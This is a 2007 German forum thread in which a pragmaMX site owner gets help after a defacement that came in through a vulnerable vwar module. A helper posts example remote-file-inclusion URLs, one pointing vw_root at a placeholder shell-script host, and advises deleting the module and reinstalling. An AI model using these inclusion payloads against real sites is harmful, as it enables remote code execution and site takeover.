Editor gehackt

Begonnen von vb, 08 März 2007, 20:24:25

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

vb

Hallo,

jetzt bin ich aber baff.
Bin heute nal so durch meinen Admin Bereich geschwirrt und als ich in den Editor rein sehe kommt da groß die Meldung:
Hackt by blablabla  :red:

So und was nun?
Muss ich Daten überspielen, löschen, SQL erneuern oder was muss ich jetzt tun?

Danke schon mal für die Hilfe.
      


         Mit freundlichen Grüßen


      


         VB

   _____________________________________________


      


         Folgende CMS im Einsatz: 2F CMS, pragmaMX

         Wer clever ist wir sich http://www.wisedock.de/user.php?rf=DE12036" target="_blank">das hier genauer ansehen.


Andi

Moin :)

Zitatdurch meinen Admin Bereich geschwirrt und als ich in den Editor rein sehe

Sorry, aber was sollen wir zu der Info sagen?
Wo kann man im Adminbereich in einen Editor reinschauen?
schön´s Grüssle, Andi

vb

#2
Hallo,

Im Admin Menü befindet sich der WYSIWYG Editor.
Er wird aber nur als Editor angezeigt  :cool:

Ich meine den WYSIWYG - Editor :)

Habe mal nachträglich ein Bild eingefügt.
      


         Mit freundlichen Grüßen


      


         VB

   _____________________________________________


      


         Folgende CMS im Einsatz: 2F CMS, pragmaMX

         Wer clever ist wir sich http://www.wisedock.de/user.php?rf=DE12036" target="_blank">das hier genauer ansehen.


Andi

ok, anscheinend wurde die /spaw/editor_cnf.php verändert.
Wie das geschehen ist kann man da nur vermuten...

Schau mal nach dem Zeitstempel der Datei und besorge die Logfiles von diesem Zeitraum.

Dann solltest du zuallererst das vwar Modul löschen (löschen, nicht deaktivieren). Deine VErsion ist völlig veraltet und ungefixt:
http://www.pragmamx.org/Forum-topic16335.0.html

Du verwendest noch pragmaMx 0.1.7, ebenfalls völlig veraltet, wenn auch sicherheitsmässig nicht relevant.
Prüfe mal mit der Versionsverwaltung ob noch mehr Dateien verändert wurden.

Dann checke deine Ordner nach Dateien, die da nicht hingehören. Da ist mit Sicherheit irgendwas eingeschleust worden, was den Hackern den Dateizugriff ermöglicht....
schön´s Grüssle, Andi

vb

Hallo Andi,

Danke erst mal für die Antwort.
Bin mir sicher das ich das Vwar gefixt habe.
Und das alte Vwar ist ja so weit dichtgemacht wie es geht aber im neuen sollen schon wieder genau so viele Scheunentore 8Sicherheitslöcher) aufgetaucht sein wie im alten :(
Jetzt stelle ich fest das ich auch keine Mails mehr empfangen kann.
Glaube das Beste wird wohl sein alles komplett neu aufzuspielen.
Ich kann dir aber wen Du magst die Daten zu kommen lassen damit du dich mal bei mir umsehen kannst um evt. Fehler zu finden. Damit sowas keinem anderen mehr passiert.  :red:
Veränderte Dateien habe ich dort jetzt eine Menge aber mit unterschiedlichen Datums angaben.
Bin irgendwie sauer, und traurig, die ganze Palette halt.
Sollen die Kinderchen doch in Ruhe anderer Leute Seite in Ruhe lassen.  :thumbdown:
      


         Mit freundlichen Grüßen


      


         VB

   _____________________________________________


      


         Folgende CMS im Einsatz: 2F CMS, pragmaMX

         Wer clever ist wir sich http://www.wisedock.de/user.php?rf=DE12036" target="_blank">das hier genauer ansehen.


Andi

Hi :)

jop, dein vwar ist total löchrig:
http://division-nordland.org/modules.php?name=vwar&file=member&vwar_root=http://www.pragmamx.org/index.php?
Ich würde den kompletten Ordner sofort löschen.

Fehlt nur der richtige include und alles ist offen....


Jop, lass mir mal ftp Zugang per PN zukommen...


Übrigens bist du in bester Gesellschaft:
h**p://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,UyuSsman/page,10

schön´s Grüssle, Andi

xerraxde

Und da alles einen Grund hat, tippe ich mal das diese türkischen Hacker deine Seite als rassistisch angesehen haben.

vb

Hallo Andi, :puzzled:

Na der Typ hat wohl nix anderes zu tun als dumm rum zu hacken :mad2:
Übrigens, Du hast eine PM  :smile:
Danke schon mal für die Hilfe sag bitte bescheid was der so angestellt hat wen du das raus bekommen hast.
Wollte eigentlich mit dem aktualisieren warten bis das neue PragmaMX draußen ist aber zum Übergang bastelte ich mir was anderes zusammen und wen es dann raus ist steige ich wieder auf ein gutes, schnelles und sicheres PragmaMX um.

Danke nochmal fürs kucken und die Hilfe.

Bis später.
      


         Mit freundlichen Grüßen


      


         VB

   _____________________________________________


      


         Folgende CMS im Einsatz: 2F CMS, pragmaMX

         Wer clever ist wir sich http://www.wisedock.de/user.php?rf=DE12036" target="_blank">das hier genauer ansehen.


vb

Da bin ich schon wieder,

ob er was bringt so etwas in der Art in Zukunft zu installieren?

http://www.joomla-addons.org/components/blocklist/blocklist.html
Hält einen der über Proxys geht zwar nur 10 min. auf auf aber immerhin, besser als nichts.
      


         Mit freundlichen Grüßen


      


         VB

   _____________________________________________


      


         Folgende CMS im Einsatz: 2F CMS, pragmaMX

         Wer clever ist wir sich http://www.wisedock.de/user.php?rf=DE12036" target="_blank">das hier genauer ansehen.


Future

Zitat von: vb am 08 März 2007, 23:34:41
Da bin ich schon wieder,

ob er was bringt so etwas in der Art in Zukunft zu installieren?

http://www.joomla-addons.org/components/blocklist/blocklist.html
Hält einen der über Proxys geht zwar nur 10 min. auf auf aber immerhin, besser als nichts.

Das einfachste ist - zumindest so wie ich das hier lese - du setzt das VWAR Modul nicht mehr ein, oder machst es dir sicher bzw. lässt es dir sicher machen.

Andi

#10
Moin :)

jop, so wie future schreibt....  :thumbup:


Zitatob er was bringt so etwas in der Art in Zukunft zu installieren?
Nein, das bringt absolut nichts, solange die Dateien des vwar-Moduls alle auch direkt aufgerufen werden können und so auch der exploit ausgenutzt werden kann.

Ich habe nochmal bisserl rumgesucht und tatsächlich noch eine gefährliche völlig ungefixte Datei im Modul gefunden:
http://***-nordland.org/modules/v*war*/includes/******.php?vw_root=http://URL_ZUM_SHELLSCRIPT/?

Hier, die beiliegende html-Seite war, auf deiner Seite, der include eines Shellscriptes, wie sie im Internet zu hunderten zu finden sind. (leider nur ne "nicht englische" Version)
Nett, was man da alles anstellen kann....


PS, IP: 84.172.33.148 war ich...



EDIT: exploit verfälscht und URL geändert
schön´s Grüssle, Andi

vb

Guten Morgen :)

Danke für's nachsehen.
Ja schon erschreckend was man alles im Internet machen kann. :o
Mann kann ja wirklich alles auslesen. Und ich wundere mich das ich seit Tagen keine Mails mehr empfange.
Dann werde ich mich nach der Arbeit mal daran machen die Einträge im Forum und die ganzen News zu sichern.
Danach mache ich alles komplett platt, spiele es neu auf (ohne Vwar)
Neue Passwörter für FTP, SQL, Mail und Co. und das sollte es sein (Hoffe ich).
Danke noch mal für die Hilfe.
      


         Mit freundlichen Grüßen


      


         VB

   _____________________________________________


      


         Folgende CMS im Einsatz: 2F CMS, pragmaMX

         Wer clever ist wir sich http://www.wisedock.de/user.php?rf=DE12036" target="_blank">das hier genauer ansehen.


vb

Hallo,

hätte noch eine Frage zum Thema.
Ist der WYSIWYG Editor eigentlich sicher?
Wen ich mir die logs so ansehe ist er ja über das Vwar in den Editor gekommen, wo anderst hatte er keine Chance und den Editor hatte ich sogar deaktiviert.
Das Vwar kommt mir in Zukunft nicht mehr auf die Seite da muss ich halt was basteln.


      


         Mit freundlichen Grüßen


      


         VB

   _____________________________________________


      


         Folgende CMS im Einsatz: 2F CMS, pragmaMX

         Wer clever ist wir sich http://www.wisedock.de/user.php?rf=DE12036" target="_blank">das hier genauer ansehen.


Andi

Hi :)

bis auf eine "theoretische" Lücke in einer älteren Version, dürfte der Editor sicher sein.

Der Editor selbst wurde ja auch nicht zum Hack verwendet. Es wurde eine Datei des Editors durch ein fremdes Script vollständig überschrieben (nicht verändert). Das hätte im Prinzip jede Datei treffen können. Warum der hacker gerade diese Datei verändert hat ist mir schleierhaft. Vielleicht wollte er die Spur verwischen und vortäuschen, dass da ein uraltes Sicherheitsproblem (im pragmaMx nie enthalten) des Spaw ausgenutzt wurde....
schön´s Grüssle, Andi